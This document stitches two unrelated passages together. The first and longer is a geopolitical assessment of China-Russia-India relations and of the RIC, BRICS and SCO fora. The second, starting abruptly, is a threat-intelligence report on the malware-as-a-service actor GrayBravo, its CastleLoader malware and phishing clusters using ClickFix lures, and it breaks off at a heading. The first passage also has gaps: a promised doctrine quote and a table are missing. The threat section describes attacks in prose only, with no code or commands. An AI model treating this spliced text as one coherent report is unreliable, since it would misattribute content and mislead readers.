India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancing act seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.

Russia’s Foreign Policy

Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:

Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.

China-Russia: Strategic Partners in Countering the West

In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.

Political Dynamics

Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple joint statements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.

Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.

Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.

At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.

Economic Dynamics

Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.

China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.

In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevant goods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.

Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).

There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.

Military Dynamics

Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.

In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”

Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.

Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.

Cooperation in Propaganda and Influence Operations

We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”

China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.

Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.

China-India: Nascent Thaw of Longtime Tension-Filled Relationship

China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.

In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.

Political Dynamics

China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacks against Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.

Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.

Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.

Economic Dynamics

We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India issued Press Note 3, which limited Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.

Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.

India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.

India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolstered investment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursued efforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.

Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceived as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.

Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.

Military Dynamics

We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.

India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.

In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.

Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.

India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade

India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”

Political Dynamics

India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”

India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”

Economic Dynamics

Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.

Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.

Military Dynamics

We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.

Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.

The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.

State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation

China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.

Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.

RIC Format: Dormant, Though Russia and China Are Interested in Reviving It

The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.

Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.

In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.

BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement

The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.

Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.

Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.

We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”

Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests

Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.

China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.

We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.

Indicators of Deeper Trilateral Cooperation

The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.

Executive Summary

Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.

For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.

To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).

Key Findings

• Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
• One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
• Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.

Background

In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.

Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.

Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.

Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)

Threat Analysis

Higher Tier Infrastructure

Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.

Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)

CastleRAT

